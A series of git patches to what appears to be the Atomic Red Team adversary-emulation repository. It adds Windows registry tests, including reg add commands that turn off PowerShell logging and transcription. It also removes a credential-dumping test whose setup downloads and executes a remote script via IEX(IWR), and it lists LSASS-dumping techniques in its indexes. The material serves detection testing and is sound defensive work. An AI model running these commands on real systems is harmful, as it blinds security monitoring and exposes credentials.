+ +## Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry +Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. +See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 795d3248-0394-4d4d-8e86-4e8df2a2693f + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f +reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands: +```cmd +reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1 +reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1 +``` + + + + +
From c761e68ca050960da0e565038be5d7d326178901 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 18 Mar 2022 21:02:44 +0100 Subject: [PATCH 72/83] NoTrayContextMenu fix (#1820) --- atomics/T1112/T1112.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 48cdab44..18c5eb9b 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -385,7 +385,7 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1 name: command_prompt From de5e865929fec8ae0137991639a4eebbab9fa89b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 18 Mar 2022 20:03:18 +0000 Subject: [PATCH 73/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1112/T1112.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 5423cc2f..a99d8565 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -32103,7 +32103,7 @@ defense-evasion: - windows executor: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" - /v StartMenuLogOff /t REG_DWORD /d 1 /f + /v NoTrayContextMenu /t REG_DWORD /d 1 /f ' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 1b235756..7777c1a3 100644 --- a/atomics/T1112/T1112.md 
+++ b/atomics/T1112/T1112.md @@ -908,7 +908,7 @@ See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d ```cmd -reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f ``` #### Cleanup Commands: From 0b336ae4985af226ed2624603a3b3852a2cc750d Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Sat, 19 Mar 2022 03:06:40 +0700 Subject: [PATCH 74/83] Update T1112.yaml (#1821) Modified Windows Powershell registry to disable Logging module. Co-authored-by: Carrie Roberts --- atomics/T1112/T1112.yaml | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 18c5eb9b..25487998 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml 
@@ -493,6 +493,26 @@ atomic_tests: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f cleanup_command: | reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1 - reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1 + reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Windows Powershell Logging Disabled + auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution + see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging + supported_platforms: + - windows + executor: + command: | + reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f + reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f + reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f + reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f + cleanup_command: | + reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1 + reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1 + reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1 + reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1 name: command_prompt elevation_required: true 
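Review bot: The fourth `reg add` line sets `EnableScripts` to `0` under `HKCU\Software\Policies\Microsoft\Windows\PowerShell`, which is the "Turn on Script Execution" policy rather than a logging control, so the test name `Windows Powershell Logging Disabled` understates what the test changes; either drop that line and its cleanup counterpart, or rename to something like `Windows Powershell Logging And Script Execution Disabled`. Because that value blocks PowerShell scripts for the user until cleanup runs, a failed cleanup could break subsequent `powershell`-executor atomics on the same host, which is worth calling out in the description. All four writes are to `HKCU`, so `elevation_required: true` appears unnecessary — confirm before changing it. Cleanup removes the values with `/v ... /f` but leaves the `ModuleLogging`, `ScriptBlockLogging` and `Transcription` subkeys behind if they did not exist before the test.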
From 84a753eb233b187b78af00458aba2282127b9da6 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 18 Mar 2022 20:07:11 +0000 Subject: [PATCH 75/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e2b027a3..9f881dc3 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -932,3 +932,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e f650456b-bd49-4bc1-ae9d-271b5b9581e7 66e647d1-8741-4e43-b7c1-334760c2047f 795d3248-0394-4d4d-8e86-4e8df2a2693f +95b25212-91a7-42ff-9613-124aca6845a8 From b4893d15adcdf1e5ab0a2fef19fbb4b97499a6ab Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 18 Mar 2022 20:07:16 +0000 Subject: [PATCH 76/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 22 +++++++++- atomics/T1112/T1112.md | 43 ++++++++++++++++++- 6 files changed, 67 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8344679a..9f786fc3 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -505,6 +505,7 @@ defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Fea defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt +defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 4fc63db9..c360f681 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -335,6 +335,7 @@ defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Fea defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt +defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 2d17e41a..acedc648 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -780,6 +780,7 @@ - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows] - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows] - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows] + - Atomic Test #32: Windows Powershell Logging Disabled [windows] - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 0defaf92..b03e5140 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -547,6 +547,7 @@ - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows] - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows] - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows] + - Atomic Test #32: Windows Powershell Logging Disabled [windows] - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a99d8565..4a7a7757 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -32237,7 +32237,27 @@ defense-evasion: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f cleanup_command: | reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1 - reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1 + reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1 + name: command_prompt + elevation_required: true + - name: Windows Powershell Logging Disabled + auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution + see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging + supported_platforms: + - windows + executor: + command: | + reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f + reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f + reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f + reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f + cleanup_command: | + reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1 + reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1 + reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1 + reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1 name: command_prompt elevation_required: true 
T1601: diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 7777c1a3..cbc144da 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -72,6 +72,8 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-31---windows-modify-show-compress-color-and-info-tip-registry) +- [Atomic Test #32 - Windows Powershell Logging Disabled](#atomic-test-32---windows-powershell-logging-disabled) +
@@ -1152,7 +1154,46 @@ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Sho #### Cleanup Commands: ```cmd reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1 -reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1 +reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #32 - Windows Powershell Logging Disabled +Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution +see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 95b25212-91a7-42ff-9613-124aca6845a8 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f +reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f +reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f +reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands: +```cmd +reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1 +reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1 +reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1 +reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1 ``` From 30177c92f873f0a295124ea50806c35ef8702c43 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Mon, 21 Mar 2022 16:33:53 -0600 Subject: [PATCH 77/83] delete broken wce test (#1822) --- atomics/T1003.001/T1003.001.yaml | 50 -------------------------------- 1 file changed, 50 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 8f5c91e8..095c52dc 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml 
@@ -1,56 +1,6 @@ attack_technique: T1003.001 display_name: "OS Credential Dumping: LSASS Memory" atomic_tests: -- name: Windows Credential Editor - auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed - description: | - Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) - - Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. - - If you see no output it is likely that execution was blocked by Anti-Virus. - - If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first. - supported_platforms: - - windows - input_arguments: - output_file: - description: Path where resulting data should be placed - type: Path - default: '%temp%\wce-output.txt' - wce_zip_hash: - description: File hash of the Windows Credential Editor zip file - type: String - default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933 - wce_exe: - description: Path of Windows Credential Editor executable - type: Path - default: PathToAtomicsFolder\T1003.001\bin\wce.exe - wce_url: - description: Path to download Windows Credential Editor zip file - type: Url - default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip - dependency_executor_name: powershell - dependencies: - - description: | - Windows Credential Editor must exist on disk at specified location (#{wce_exe}) - prereq_command: | - if (Test-Path #{wce_exe}) {exit 0} else {exit 1} - get_prereq_command: | - $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) - if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ - 
Expand-Archive $zippath $parentpath\wce -Force - Move-Item $parentpath\wce\wce.exe "#{wce_exe}" - Remove-Item $zippath, $parentpath\wce -Recurse - } - executor: - command: | - #{wce_exe} -o #{output_file} - cleanup_command: del "#{output_file}" >nul 2>&1 - name: command_prompt - elevation_required: true - name: Dump LSASS.exe Memory using ProcDump auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 description: | From 2e2691614773477407054e49e3609fbf44371150 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 21 Mar 2022 22:34:50 +0000 Subject: [PATCH 78/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 25 ++-- atomics/Indexes/Indexes-CSV/windows-index.csv | 25 ++-- atomics/Indexes/Indexes-Markdown/index.md | 25 ++-- .../Indexes/Indexes-Markdown/windows-index.md | 25 ++-- atomics/Indexes/index.yaml | 51 -------- atomics/T1003.001/T1003.001.md | 115 ++++-------------- 6 files changed, 72 insertions(+), 194 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 9f786fc3..3e44f2c3 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -53,19 +53,18 @@ credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-b credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt -credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt -credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt -credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell -credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt -credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt -credential-access,T1003.001,LSASS Memory,6,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual -credential-access,T1003.001,LSASS Memory,7,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt -credential-access,T1003.001,LSASS Memory,8,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt -credential-access,T1003.001,LSASS Memory,9,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell -credential-access,T1003.001,LSASS Memory,10,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt -credential-access,T1003.001,LSASS Memory,11,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell -credential-access,T1003.001,LSASS Memory,12,Dump LSASS with 
.Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell -credential-access,T1003.001,LSASS Memory,13,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell +credential-access,T1003.001,LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt +credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell +credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt +credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt +credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual +credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt +credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt +credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell +credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt +credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell +credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit 
from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c360f681..42ff77ea 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -33,19 +33,18 @@ credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,9 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt -credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt -credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt -credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell -credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt -credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt -credential-access,T1003.001,LSASS Memory,6,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual -credential-access,T1003.001,LSASS Memory,7,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt -credential-access,T1003.001,LSASS Memory,8,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt -credential-access,T1003.001,LSASS Memory,9,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell -credential-access,T1003.001,LSASS Memory,10,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt -credential-access,T1003.001,LSASS Memory,11,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell -credential-access,T1003.001,LSASS Memory,12,Dump LSASS 
with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell -credential-access,T1003.001,LSASS Memory,13,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell +credential-access,T1003.001,LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt +credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell +credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt +credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt +credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual +credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt +credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt +credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell +credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt +credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell +credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 